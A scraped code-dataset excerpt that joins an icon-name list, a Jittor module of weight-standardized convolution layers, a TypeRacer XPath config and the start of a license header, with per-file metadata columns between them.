"),("faSensorSmoke","faSensorSmoke"),("faServer","faServer"),("faServicestack","faServicestack"),("faShapes","faShapes"),("faShare","faShare"),("faShareAll","faShareAll"),("faShareAlt","faShareAlt"),("faShareAltSquare","faShareAltSquare"),("faShareSquare","faShareSquare"),("faSheep","faSheep"),("faShekelSign","faShekelSign"),("faShield","faShield"),("faShieldAlt","faShieldAlt"),("faShieldCheck","faShieldCheck"),("faShieldCross","faShieldCross"),("faShieldVirus","faShieldVirus"),("faShip","faShip"),("faShippingFast","faShippingFast"),("faShippingTimed","faShippingTimed"),("faShirtsinbulk","faShirtsinbulk"),("faShishKebab","faShishKebab"),("faShoePrints","faShoePrints"),("faShopify","faShopify"),("faShoppingBag","faShoppingBag"),("faShoppingBasket","faShoppingBasket"),("faShoppingCart","faShoppingCart"),("faShopware","faShopware"),("faShovel","faShovel"),("faShovelSnow","faShovelSnow"),("faShower","faShower"),("faShredder","faShredder"),("faShuttleVan","faShuttleVan"),("faShuttlecock","faShuttlecock"),("faSickle","faSickle"),("faSigma","faSigma"),("faSign","faSign"),("faSignIn","faSignIn"),("faSignInAlt","faSignInAlt"),("faSignLanguage","faSignLanguage"),("faSignOut","faSignOut"),("faSignOutAlt","faSignOutAlt"),("faSignal","faSignal"),("faSignal1","faSignal1"),("faSignal2","faSignal2"),("faSignal3","faSignal3"),("faSignal4","faSignal4"),("faSignalAlt","faSignalAlt"),("faSignalAlt1","faSignalAlt1"),("faSignalAlt2","faSignalAlt2"),("faSignalAlt3","faSignalAlt3"),("faSignalAltSlash","faSignalAltSlash"),("faSignalSlash","faSignalSlash"),("faSignalStream","faSignalStream"),("faSignature","faSignature"),("faSimCard","faSimCard"),("faSimplybuilt","faSimplybuilt"),("faSink","faSink"),("faSiren","faSiren"),("faSirenOn","faSirenOn"),("faSistrix","faSistrix"),("faSitemap","faSitemap"),("faSith","faSith"),("faSkating","faSkating"),("faSkeleton","faSkeleton"),("faSketch","faSketch"),("faSkiJump","faSkiJump"),("faSkiLift","faSkiLift"),("faSkiing","faSkiing"),("faSkiingNordic","faSkiingNordic"),("faSkull","faSkull"),("faSkullCow","faSkullCow"),("faSkullCrossbones","faSkullCrossbones"),("faSkyatlas","faSkyatlas"),("faSkype","faSkype"),("faSlack","faSlack"),("faSlackHash","faSlackHash"),("faSlash","faSlash"),("faSledding","faSledding"),("faSleigh","faSleigh"),("faSlidersH","faSlidersH"),("faSlidersHSquare","faSlidersHSquare"),("faSlidersV","faSlidersV"),("faSlidersVSquare","faSlidersVSquare"),("faSlideshare","faSlideshare"),("faSmile","faSmile"),("faSmileBeam","faSmileBeam"),("faSmilePlus","faSmilePlus"),("faSmileWink","faSmileWink"),("faSmog","faSmog"),("faSmoke","faSmoke"),("faSmoking","faSmoking"),("faSmokingBan","faSmokingBan"),("faSms","faSms"),("faSnake","faSnake"),("faSnapchat","faSnapchat"),("faSnapchatGhost","faSnapchatGhost"),("faSnapchatSquare","faSnapchatSquare"),("faSnooze","faSnooze"),("faSnowBlowing","faSnowBlowing"),("faSnowboarding","faSnowboarding"),("faSnowflake","faSnowflake"),("faSnowflakes","faSnowflakes"),("faSnowman","faSnowman"),("faSnowmobile","faSnowmobile"),("faSnowplow","faSnowplow"),("faSoap","faSoap"),("faSocks","faSocks"),("faSolarPanel","faSolarPanel"),("faSolarSystem","faSolarSystem"),("faSort","faSort"),("faSortAlphaDown","faSortAlphaDown"),("faSortAlphaDownAlt","faSortAlphaDownAlt"),("faSortAlphaUp","faSortAlphaUp"),("faSortAlphaUpAlt","faSortAlphaUpAlt"),("faSortAlt","faSortAlt"),("faSortAmountDown","faSortAmountDown"),("faSortAmountDownAlt","faSortAmountDownAlt"),("faSortAmountUp","faSortAmountUp"),("faSortAmountUpAlt","faSortAmountUpAlt"),("faSortCircle","faSortCircle"),("faSortCircleDown","faSortCircleDown"),("faSortCircleUp","faSortCircleUp"),("faSortDown","faSortDown"),("faSortNumericDown","faSortNumericDown"),("faSortNumericDownAlt","faSortNumericDownAlt"),("faSortNumericUp","faSortNumericUp"),("faSortNumericUpAlt","faSortNumericUpAlt"),("faSortShapesDown","faSortShapesDown"),("faSortShapesDownAlt","faSortShapesDownAlt"),("faSortShapesUp","faSortShapesUp"),("faSortShapesUpAlt","faSortShapesUpAlt"),("faSortSizeDown","faSortSizeDown"),("faSortSizeDownAlt","faSortSizeDownAlt"),("faSortSizeUp","faSortSizeUp"),("faSortSizeUpAlt","faSortSizeUpAlt"),("faSortUp","faSortUp"),("faSoundcloud","faSoundcloud"),("faSoup","faSoup"),("faSourcetree","faSourcetree"),("faSpa","faSpa"),("faSpaceShuttle","faSpaceShuttle"),("faSpaceStationMoon","faSpaceStationMoon"),("faSpaceStationMoonAlt","faSpaceStationMoonAlt"),("faSpade","faSpade"),("faSparkles","faSparkles"),("faSpeakap","faSpeakap"),("faSpeaker","faSpeaker"),("faSpeakerDeck","faSpeakerDeck"),("faSpeakers","faSpeakers"),("faSpellCheck","faSpellCheck"),("faSpider","faSpider"),("faSpiderBlackWidow","faSpiderBlackWidow"),("faSpiderWeb","faSpiderWeb"),("faSpinner","faSpinner"),("faSpinnerThird","faSpinnerThird"),("faSplotch","faSplotch"),("faSpotify","faSpotify"),("faSprayCan","faSprayCan"),("faSprinkler","faSprinkler"),("faSquare","faSquare"),("faSquareFull","faSquareFull"),("faSquareRoot","faSquareRoot"),("faSquareRootAlt","faSquareRootAlt"),("faSquarespace","faSquarespace"),("faSquirrel","faSquirrel"),("faStackExchange","faStackExchange"),("faStackOverflow","faStackOverflow"),("faStackpath","faStackpath"),("faStaff","faStaff"),("faStamp","faStamp"),("faStar","faStar"),("faStarAndCrescent","faStarAndCrescent"),("faStarChristmas","faStarChristmas"),("faStarExclamation","faStarExclamation"),("faStarHalf","faStarHalf"),("faStarHalfAlt","faStarHalfAlt"),("faStarOfDavid","faStarOfDavid"),("faStarOfLife","faStarOfLife"),("faStarShooting","faStarShooting"),("faStarfighter","faStarfighter"),("faStarfighterAlt","faStarfighterAlt"),("faStars","faStars"),("faStarship","faStarship"),("faStarshipFreighter","faStarshipFreighter"),("faStaylinked","faStaylinked"),("faSteak","faSteak"),("faSteam","faSteam"),("faSteamSquare","faSteamSquare"),("faSteamSymbol","faSteamSymbol"),("faSteeringWheel","faSteeringWheel"),("faStepBackward","faStepBackward"),("faStepForward","faStepForward"),("faStethoscope","faStethoscope"),("faStickerMule","faStickerMule"),("faStickyNote","faStickyNote"),("faStocking","faStocking"),("faStomach","faStomach"),("faStop","faStop"),("faStopCircle","faStopCircle"),("faStopwatch","faStopwatch"),("faStopwatch20","faStopwatch20"),("faStore","faStore"),("faStoreAlt","faStoreAlt"),("faStoreAltSlash","faStoreAltSlash"),("faStoreSlash","faStoreSlash"),("faStrava","faStrava"),("faStream","faStream"),("faStreetView","faStreetView"),("faStretcher","faStretcher"),("faStrikethrough","faStrikethrough"),("faStripe","faStripe"),("faStripeS","faStripeS"),("faStroopwafel","faStroopwafel"),("faStudiovinari","faStudiovinari"),("faStumbleupon","faStumbleupon"),("faStumbleuponCircle","faStumbleuponCircle"),("faSubscript","faSubscript"),("faSubway","faSubway"),("faSuitcase","faSuitcase"),("faSuitcaseRolling","faSuitcaseRolling"),("faSun","faSun"),("faSunCloud","faSunCloud"),("faSunDust","faSunDust"),("faSunHaze","faSunHaze"),("faSunglasses","faSunglasses"),("faSunrise","faSunrise"),("faSunset","faSunset"),("faSuperpowers","faSuperpowers"),("faSuperscript","faSuperscript"),("faSupple","faSupple"),("faSurprise","faSurprise"),("faSuse","faSuse"),("faSwatchbook","faSwatchbook"),("faSwift","faSwift"),("faSwimmer","faSwimmer"),("faSwimmingPool","faSwimmingPool"),("faSword","faSword"),("faSwordLaser","faSwordLaser"),("faSwordLaserAlt","faSwordLaserAlt"),("faSwords","faSwords"),("faSwordsLaser","faSwordsLaser"),("faSymfony","faSymfony"),("faSynagogue","faSynagogue"),("faSync","faSync"),("faSyncAlt","faSyncAlt"),("faSyringe","faSyringe"),("faTable","faTable"),("faTableTennis","faTableTennis"),("faTablet","faTablet"),("faTabletAlt","faTabletAlt"),("faTabletAndroid","faTabletAndroid"),("faTabletAndroidAlt","faTabletAndroidAlt"),("faTabletRugged","faTabletRugged"),("faTablets","faTablets"),("faTachometer","faTachometer"),("faTachometerAlt","faTachometerAlt"),("faTachometerAltAverage","faTachometerAltAverage"),("faTachometerAltFast","faTachometerAltFast"),("faTachometerAltFastest","faTachometerAltFastest"),("faTachometerAltSlow","faTachometerAltSlow"),("faTachometerAltSlowest","faTachometerAltSlowest"),("faTachometerAverage","faTachometerAverage"),("faTachometerFast","faTachometerFast"),("faTachometerFastest","faTachometerFastest"),("faTachometerSlow","faTachometerSlow"),("faTachometerSlowest","faTachometerSlowest"),("faTaco","faTaco"),("faTag","faTag"),("faTags","faTags"),("faTally","faTally"),("faTanakh","faTanakh"),("faTape","faTape"),("faTasks","faTasks"),("faTasksAlt","faTasksAlt"),("faTaxi","faTaxi"),("faTeamspeak","faTeamspeak"),("faTeeth","faTeeth"),("faTeethOpen","faTeethOpen"),("faTelegram","faTelegram"),("faTelegramPlane","faTelegramPlane"),("faTelescope","faTelescope"),("faTemperatureDown","faTemperatureDown"),("faTemperatureFrigid","faTemperatureFrigid"),("faTemperatureHigh","faTemperatureHigh"),("faTemperatureHot","faTemperatureHot"),("faTemperatureLow","faTemperatureLow"),("faTemperatureUp","faTemperatureUp"),("faTencentWeibo","faTencentWeibo"),("faTenge","faTenge"),("faTennisBall","faTennisBall"),("faTerminal","faTerminal"),("faText","faText"),("faTextHeight","faTextHeight"),("faTextSize","faTextSize"),("faTextWidth","faTextWidth"),("faTh","faTh"),("faThLarge","faThLarge"),("faThList","faThList"),("faTheRedYeti","faTheRedYeti"),("faTheaterMasks","faTheaterMasks"),("faThemeco","faThemeco"),("faThemeisle","faThemeisle"),("faThermometer","faThermometer"),("faThermometerEmpty","faThermometerEmpty"),("faThermometerFull","faThermometerFull"),("faThermometerHalf","faThermometerHalf"),("faThermometerQuarter","faThermometerQuarter"),("faThermometerThreeQuarters","faThermometerThreeQuarters"),("faTheta","faTheta"),("faThinkPeaks","faThinkPeaks"),("faThumbsDown","faThumbsDown"),("faThumbsUp","faThumbsUp"),("faThumbtack","faThumbtack"),("faThunderstorm","faThunderstorm"),("faThunderstormMoon","faThunderstormMoon"),("faThunderstormSun","faThunderstormSun"),("faTicket","faTicket"),("faTicketAlt","faTicketAlt"),("faTiktok","faTiktok"),("faTilde","faTilde"),("faTimes","faTimes"),("faTimesCircle","faTimesCircle"),("faTimesHexagon","faTimesHexagon"),("faTimesOctagon","faTimesOctagon"),("faTimesSquare","faTimesSquare"),("faTint","faTint"),("faTintSlash","faTintSlash"),("faTire","faTire"),("faTireFlat","faTireFlat"),("faTirePressureWarning","faTirePressureWarning"),("faTireRugged","faTireRugged"),("faTired","faTired"),("faToggleOff","faToggleOff"),("faToggleOn","faToggleOn"),("faToilet","faToilet"),("faToiletPaper","faToiletPaper"),("faToiletPaperAlt","faToiletPaperAlt"),("faToiletPaperSlash","faToiletPaperSlash"),("faTombstone","faTombstone"),("faTombstoneAlt","faTombstoneAlt"),("faToolbox","faToolbox"),("faTools","faTools"),("faTooth","faTooth"),("faToothbrush","faToothbrush"),("faTorah","faTorah"),("faToriiGate","faToriiGate"),("faTornado","faTornado"),("faTractor","faTractor"),("faTradeFederation","faTradeFederation"),("faTrademark","faTrademark"),("faTrafficCone","faTrafficCone"),("faTrafficLight","faTrafficLight"),("faTrafficLightGo","faTrafficLightGo"),("faTrafficLightSlow","faTrafficLightSlow"),("faTrafficLightStop","faTrafficLightStop"),("faTrailer","faTrailer"),("faTrain","faTrain"),("faTram","faTram"),("faTransgender","faTransgender"),("faTransgenderAlt","faTransgenderAlt"),("faTransporter","faTransporter"),("faTransporter1","faTransporter1"),("faTransporter2","faTransporter2"),("faTransporter3","faTransporter3"),("faTransporterEmpty","faTransporterEmpty"),("faTrash","faTrash"),("faTrashAlt","faTrashAlt"),("faTrashRestore","faTrashRestore"),("faTrashRestoreAlt","faTrashRestoreAlt"),("faTrashUndo","faTrashUndo"),("faTrashUndoAlt","faTrashUndoAlt"),("faTreasureChest","faTreasureChest"),("faTree","faTree"),("faTreeAlt","faTreeAlt"),("faTreeChristmas","faTreeChristmas"),("faTreeDecorated","faTreeDecorated"),("faTreeLarge","faTreeLarge"),("faTreePalm","faTreePalm"),("faTrees","faTrees"),("faTrello","faTrello"),("faTriangle","faTriangle"),("faTriangleMusic","faTriangleMusic"),("faTrophy","faTrophy"),("faTrophyAlt","faTrophyAlt"),("faTruck","faTruck"),("faTruckContainer","faTruckContainer"),("faTruckCouch","faTruckCouch"),("faTruckLoading","faTruckLoading"),("faTruckMonster","faTruckMonster"),("faTruckMoving","faTruckMoving"),("faTruckPickup","faTruckPickup"),("faTruckPlow","faTruckPlow"),("faTruckRamp","faTruckRamp"),("faTrumpet","faTrumpet"),("faTshirt","faTshirt"),("faTty","faTty"),("faTumblr","faTumblr"),("faTumblrSquare","faTumblrSquare"),("faTurkey","faTurkey"),("faTurntable","faTurntable"),("faTurtle","faTurtle"),("faTv","faTv"),("faTvAlt","faTvAlt"),("faTvMusic","faTvMusic"),("faTvRetro","faTvRetro"),("faTwitch","faTwitch"),("faTwitter","faTwitter"),("faTwitterSquare","faTwitterSquare"),("faTypewriter","faTypewriter"),("faTypo3","faTypo3"),("faUber","faUber"),("faUbuntu","faUbuntu"),("faUfo","faUfo"),("faUfoBeam","faUfoBeam"),("faUikit","faUikit"),("faUmbraco","faUmbraco"),("faUmbrella","faUmbrella"),("faUmbrellaBeach","faUmbrellaBeach"),("faUncharted","faUncharted"),("faUnderline","faUnderline"),("faUndo","faUndo"),("faUndoAlt","faUndoAlt"),("faUnicorn","faUnicorn"),("faUnion","faUnion"),("faUniregistry","faUniregistry"),("faUnity","faUnity"),("faUniversalAccess","faUniversalAccess"),("faUniversity","faUniversity"),("faUnlink","faUnlink"),("faUnlock","faUnlock"),("faUnlockAlt","faUnlockAlt"),("faUnsplash","faUnsplash"),("faUntappd","faUntappd"),("faUpload","faUpload"),("faUps","faUps"),("faUsb","faUsb"),("faUsbDrive","faUsbDrive"),("faUsdCircle","faUsdCircle"),("faUsdSquare","faUsdSquare"),("faUser","faUser"),("faUserAlien","faUserAlien"),("faUserAlt","faUserAlt"),("faUserAltSlash","faUserAltSlash"),("faUserAstronaut","faUserAstronaut"),("faUserChart","faUserChart"),("faUserCheck","faUserCheck"),("faUserCircle","faUserCircle"),("faUserClock","faUserClock"),("faUserCog","faUserCog"),("faUserCowboy","faUserCowboy"),("faUserCrown","faUserCrown"),("faUserEdit","faUserEdit"),("faUserFriends","faUserFriends"),("faUserGraduate","faUserGraduate"),("faUserHardHat","faUserHardHat"),("faUserHeadset","faUserHeadset"),("faUserInjured","faUserInjured"),("faUserLock","faUserLock"),("faUserMd","faUserMd"),("faUserMdChat","faUserMdChat"),("faUserMinus","faUserMinus"),("faUserMusic","faUserMusic"),("faUserNinja","faUserNinja"),("faUserNurse","faUserNurse"),("faUserPlus","faUserPlus"),("faUserRobot","faUserRobot"),("faUserSecret","faUserSecret"),("faUserShield","faUserShield"),("faUserSlash","faUserSlash"),("faUserTag","faUserTag"),("faUserTie","faUserTie"),("faUserTimes","faUserTimes"),("faUserUnlock","faUserUnlock"),("faUserVisor","faUserVisor"),("faUsers","faUsers"),("faUsersClass","faUsersClass"),("faUsersCog","faUsersCog"),("faUsersCrown","faUsersCrown"),("faUsersMedical","faUsersMedical"),("faUsersSlash","faUsersSlash"),("faUsps","faUsps"),("faUssunnah","faUssunnah"),("faUtensilFork","faUtensilFork"),("faUtensilKnife","faUtensilKnife"),("faUtensilSpoon","faUtensilSpoon"),("faUtensils","faUtensils"),("faUtensilsAlt","faUtensilsAlt"),("faVaadin","faVaadin"),("faVacuum","faVacuum"),("faVacuumRobot","faVacuumRobot"),("faValueAbsolute","faValueAbsolute"),("faVectorSquare","faVectorSquare"),("faVenus","faVenus"),("faVenusDouble","faVenusDouble"),("faVenusMars","faVenusMars"),("faVest","faVest"),("faVestPatches","faVestPatches"),("faVhs","faVhs"),("faViacoin","faViacoin"),("faViadeo","faViadeo"),("faViadeoSquare","faViadeoSquare"),("faVial","faVial"),("faVials","faVials"),("faViber","faViber"),("faVideo","faVideo"),("faVideoPlus","faVideoPlus"),("faVideoSlash","faVideoSlash"),("faVihara","faVihara"),("faVimeo","faVimeo"),("faVimeoSquare","faVimeoSquare"),("faVimeoV","faVimeoV"),("faVine","faVine"),("faViolin","faViolin"),("faVirus","faVirus"),("faVirusSlash","faVirusSlash"),("faViruses","faViruses"),("faVk","faVk"),("faVnv","faVnv"),("faVoicemail","faVoicemail"),("faVolcano","faVolcano"),("faVolleyballBall","faVolleyballBall"),("faVolume","faVolume"),("faVolumeDown","faVolumeDown"),("faVolumeMute","faVolumeMute"),("faVolumeOff","faVolumeOff"),("faVolumeSlash","faVolumeSlash"),("faVolumeUp","faVolumeUp"),("faVoteNay","faVoteNay"),("faVoteYea","faVoteYea"),("faVrCardboard","faVrCardboard"),("faVuejs","faVuejs"),("faWagonCovered","faWagonCovered"),("faWalker","faWalker"),("faWalkieTalkie","faWalkieTalkie"),("faWalking","faWalking"),("faWallet","faWallet"),("faWand","faWand"),("faWandMagic","faWandMagic"),("faWarehouse","faWarehouse"),("faWarehouseAlt","faWarehouseAlt"),("faWasher","faWasher"),("faWatch","faWatch"),("faWatchCalculator","faWatchCalculator"),("faWatchFitness","faWatchFitness"),("faWatchmanMonitoring","faWatchmanMonitoring"),("faWater","faWater"),("faWaterLower","faWaterLower"),("faWaterRise","faWaterRise"),("faWaveSine","faWaveSine"),("faWaveSquare","faWaveSquare"),("faWaveTriangle","faWaveTriangle"),("faWaveform","faWaveform"),("faWaveformPath","faWaveformPath"),("faWaze","faWaze"),("faWebcam","faWebcam"),("faWebcamSlash","faWebcamSlash"),("faWeebly","faWeebly"),("faWeibo","faWeibo"),("faWeight","faWeight"),("faWeightHanging","faWeightHanging"),("faWeixin","faWeixin"),("faWhale","faWhale"),("faWhatsapp","faWhatsapp"),("faWhatsappSquare","faWhatsappSquare"),("faWheat","faWheat"),("faWheelchair","faWheelchair"),("faWhistle","faWhistle"),("faWhmcs","faWhmcs"),("faWifi","faWifi"),("faWifi1","faWifi1"),("faWifi2","faWifi2"),("faWifiSlash","faWifiSlash"),("faWikipediaW","faWikipediaW"),("faWind","faWind"),("faWindTurbine","faWindTurbine"),("faWindWarning","faWindWarning"),("faWindow","faWindow"),("faWindowAlt","faWindowAlt"),("faWindowClose","faWindowClose"),("faWindowFrame","faWindowFrame"),("faWindowFrameOpen","faWindowFrameOpen"),("faWindowMaximize","faWindowMaximize"),("faWindowMinimize","faWindowMinimize"),("faWindowRestore","faWindowRestore"),("faWindows","faWindows"),("faWindsock","faWindsock"),("faWineBottle","faWineBottle"),("faWineGlass","faWineGlass"),("faWineGlassAlt","faWineGlassAlt"),("faWix","faWix"),("faWizardsOfTheCoast","faWizardsOfTheCoast"),("faWodu","faWodu"),("faWolfPackBattalion","faWolfPackBattalion"),("faWonSign","faWonSign"),("faWordpress","faWordpress"),("faWordpressSimple","faWordpressSimple"),("faWpbeginner","faWpbeginner"),("faWpexplorer","faWpexplorer"),("faWpforms","faWpforms"),("faWpressr","faWpressr"),("faWreath","faWreath"),("faWrench","faWrench"),("faXRay","faXRay"),("faXbox","faXbox"),("faXing","faXing"),("faXingSquare","faXingSquare"),("faYCombinator","faYCombinator"),("faYahoo","faYahoo"),("faYammer","faYammer"),("faYandex","faYandex"),("faYandexInternational","faYandexInternational"),("faYarn","faYarn"),("faYelp","faYelp"),("faYenSign","faYenSign"),("faYinYang","faYinYang"),("faYoast","faYoast"),("faYoutube","faYoutube"),("faYoutubeSquare","faYoutubeSquare"),("faZhihu","faZhihu")] | 70,659 | 70,659 | 0.738519 | 4,621 | 70,659 | 11.292145 | 0.500325 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001132 | 0.000028 | 70,659 | 1 | 70,659 | 70,659 | 0.737379 | 0 | 0 | 0 | 0 | 0 | 0.738324 | 0.021257 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 8 |
a18a641527ec20841600bad5549ad8362509e565 | 6,381 | py | Python | backend/data/jimm/models/layers/std_conv.py | MikeOwino/JittorVis | d9568b72d684d167045121ea8ed22d694b2f9192 | [
"Apache-2.0"
] | 139 | 2021-06-24T10:32:02.000Z | 2021-06-26T10:22:07.000Z | backend/data/jimm/models/layers/std_conv.py | MikeOwino/JittorVis | d9568b72d684d167045121ea8ed22d694b2f9192 | [
"Apache-2.0"
] | 8 | 2021-06-29T07:29:06.000Z | 2022-02-28T02:16:48.000Z | backend/data/jimm/models/layers/std_conv.py | MikeOwino/JittorVis | d9568b72d684d167045121ea8ed22d694b2f9192 | [
"Apache-2.0"
] | 5 | 2021-06-27T21:04:03.000Z | 2021-08-14T03:26:17.000Z | """
Copyright VIP Group
Licensed under the Apache License, Version 2.0.
Modify from https://github.com/rwightman/pytorch-image-models
Original copyright of Ross Wightman below, modifications by VIP Group
Hacked together by / copyright Ross Wightman
"""
import numpy as np
import jittor as jt
import jittor.nn as F
from jittor import nn
from .padding import get_padding, get_padding_value, pad_same
def get_weight(module):
std, mean = np.std(module.weight.data, axis=(1, 2, 3), keepdims=True), \
np.mean(module.weight.data, axis=(1, 2, 3), keepdims=True)
std, mean = jt.array(std), jt.array(mean)
weight = (module.weight - mean) / (std + module.eps)
return weight
class StdConv2d(nn.Conv2d):
"""Conv2d with Weight Standardization. Used for BiT ResNet-V2 models.
Paper: `Micro-Batch Training with Batch-Channel Normalization and Weight Standardization` -
https://arxiv.org/abs/1903.10520v2
"""
def __init__(
self, in_channel, out_channels, kernel_size, stride=1, padding=None,
dilation=1, groups=1, bias=False, eps=1e-5):
if padding is None:
padding = get_padding(kernel_size, stride, dilation)
super().__init__(
in_channel, out_channels, kernel_size, stride=stride,
padding=padding, dilation=dilation, groups=groups, bias=bias)
self.eps = eps
def get_weight(self):
matsize = self.weight.shape[1] * self.weight.shape[2] * self.weight.shape[3]
mean = self.weight.mean(dims=(1, 2, 3), keepdims=True)
weight = self.weight - mean
std = (weight.sqr().sum(dims=(1, 2, 3), keepdims=True) / (matsize - 1)).sqrt()
weight /= (std + self.eps)
return weight
def execute(self, x):
x = F.conv2d(x, self.get_weight(), self.bias, self.stride, self.padding, self.dilation, self.groups)
return x
class StdConv2dSame(nn.Conv2d):
"""Conv2d with Weight Standardization. TF compatible SAME padding. Used for ViT Hybrid model.
Paper: `Micro-Batch Training with Batch-Channel Normalization and Weight Standardization` -
https://arxiv.org/abs/1903.10520v2
"""
def __init__(
self, in_channel, out_channels, kernel_size, stride=1, padding='SAME', dilation=1,
groups=1, bias=False, eps=1e-5):
padding, is_dynamic = get_padding_value(padding, kernel_size, stride=stride, dilation=dilation)
super().__init__(
in_channel, out_channels, kernel_size, stride=stride, padding=padding, dilation=dilation,
groups=groups, bias=bias)
self.same_pad = is_dynamic
self.eps = eps
def get_weight(self):
matsize = self.weight.shape[1] * self.weight.shape[2] * self.weight.shape[3]
mean = self.weight.mean(dims=(1, 2, 3), keepdims=True)
weight = self.weight - mean
std = (weight.sqr().sum(dims=(1, 2, 3), keepdims=True) / (matsize - 1)).sqrt()
weight /= (std + self.eps)
return weight
def execute(self, x):
if self.same_pad:
x = pad_same(x, self.kernel_size, self.stride, self.dilation)
x = F.conv2d(x, self.get_weight(), self.bias, self.stride, self.padding, self.dilation, self.groups)
return x
class ScaledStdConv2d(nn.Conv2d):
"""Conv2d layer with Scaled Weight Standardization.
Paper: `Characterizing signal propagation to close the performance gap in unnormalized ResNets` -
https://arxiv.org/abs/2101.08692
NOTE: the operations used in this impl differ slightly from the DeepMind Haiku impl. The impact is minor.
"""
def __init__(
self, in_channels, out_channels, kernel_size, stride=1, padding=None,
dilation=1, groups=1, bias=True, gamma=1.0, eps=1e-6, gain_init=1.0):
if padding is None:
padding = get_padding(kernel_size, stride, dilation)
super().__init__(
in_channels, out_channels, kernel_size, stride=stride, padding=padding, dilation=dilation,
groups=groups, bias=bias)
self.gain = jt.full((self.out_channels, 1, 1, 1), gain_init)
self.scale = gamma * self.weight[0].numel() ** -0.5 # gamma * 1 / sqrt(fan-in)
self.eps = eps
def get_weight(self):
matsize = self.weight.shape[1] * self.weight.shape[2] * self.weight.shape[3]
mean = self.weight.mean(dims=(1, 2, 3), keepdims=True)
weight = self.weight - mean
std = (weight.sqr().sum(dims=(1, 2, 3), keepdims=True) / (matsize - 1)).sqrt()
weight /= (std + self.eps)
return weight
def execute(self, x):
return F.conv2d(x, self.get_weight(), self.bias, self.stride, self.padding, self.dilation, self.groups)
class ScaledStdConv2dSame(nn.Conv2d):
"""Conv2d layer with Scaled Weight Standardization and Tensorflow-like SAME padding support
Paper: `Characterizing signal propagation to close the performance gap in unnormalized ResNets` -
https://arxiv.org/abs/2101.08692
NOTE: the operations used in this impl differ slightly from the DeepMind Haiku impl. The impact is minor.
"""
def __init__(
self, in_channels, out_channels, kernel_size, stride=1, padding='SAME',
dilation=1, groups=1, bias=True, gamma=1.0, eps=1e-6, gain_init=1.0):
padding, is_dynamic = get_padding_value(padding, kernel_size, stride=stride, dilation=dilation)
super().__init__(
in_channels, out_channels, kernel_size, stride=stride, padding=padding, dilation=dilation,
groups=groups, bias=bias)
self.gain = jt.full((self.out_channels, 1, 1, 1), gain_init)
self.scale = gamma * self.weight[0].numel() ** -0.5
self.same_pad = is_dynamic
self.eps = eps
def get_weight(self):
matsize = self.weight.shape[1] * self.weight.shape[2] * self.weight.shape[3]
mean = self.weight.mean(dims=(1, 2, 3), keepdims=True)
weight = self.weight - mean
std = (weight.sqr().sum(dims=(1, 2, 3), keepdims=True) / (matsize - 1)).sqrt()
weight /= (std + self.eps)
return weight
def execute(self, x):
if self.same_pad:
x = pad_same(x, self.kernel_size, self.stride, self.dilation)
return F.conv2d(x, self.get_weight(), self.bias, self.stride, self.padding, self.dilation, self.groups)
| 41.705882 | 111 | 0.649115 | 880 | 6,381 | 4.596591 | 0.165909 | 0.054388 | 0.047466 | 0.027194 | 0.848949 | 0.848949 | 0.829666 | 0.829666 | 0.804944 | 0.7822 | 0 | 0.029191 | 0.226924 | 6,381 | 152 | 112 | 41.980263 | 0.790797 | 0.206394 | 0 | 0.762887 | 0 | 0 | 0.001608 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.134021 | false | 0 | 0.051546 | 0.010309 | 0.319588 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a1ab36a2ec114009ca0471ca5112b5ddc87023f3 | 301 | py | Python | cfg.py | johnsonhung906/TypeRacerPro | 38baf409d49b0b3a68973e0762476890f6489aa7 | [
"MIT"
] | null | null | null | cfg.py | johnsonhung906/TypeRacerPro | 38baf409d49b0b3a68973e0762476890f6489aa7 | [
"MIT"
] | null | null | null | cfg.py | johnsonhung906/TypeRacerPro | 38baf409d49b0b3a68973e0762476890f6489aa7 | [
"MIT"
] | null | null | null | cfg = {
'site': 'https://play.typeracer.com/',
'start_xpath': '//*[@id="gwt-uid-2"]/a',
'passage_xpath': '//*[@id="gwt-uid-20"]/table/tbody/tr[2]/td/table/tbody/tr[1]/td/table/tbody/tr[1]/td/div',
'type_xpath': '//*[@id="gwt-uid-20"]/table/tbody/tr[2]/td/table/tbody/tr[2]/td/input',
} | 50.166667 | 112 | 0.581395 | 52 | 301 | 3.307692 | 0.442308 | 0.290698 | 0.348837 | 0.226744 | 0.610465 | 0.593023 | 0.488372 | 0.488372 | 0.488372 | 0.488372 | 0 | 0.036496 | 0.089701 | 301 | 6 | 113 | 50.166667 | 0.591241 | 0 | 0 | 0 | 0 | 0.333333 | 0.807947 | 0.592715 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.166667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
a1b13c8fa2444fc02f669597bb0edb3476a962df | 12,176 | py | Python | src/ascat/eumetsat.py | lweydemann/ascat | 9c986ba40694a13356c44f403c66d73ccaab83bf | [
"MIT"
] | null | null | null | src/ascat/eumetsat.py | lweydemann/ascat | 9c986ba40694a13356c44f403c66d73ccaab83bf | [
"MIT"
] | null | null | null | src/ascat/eumetsat.py | lweydemann/ascat | 9c986ba40694a13356c44f403c66d73ccaab83bf | [
"MIT"
] | null | null | null | # Copyright (c) 2020, TU Wien, Department of Geodesy and Geoinformation
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
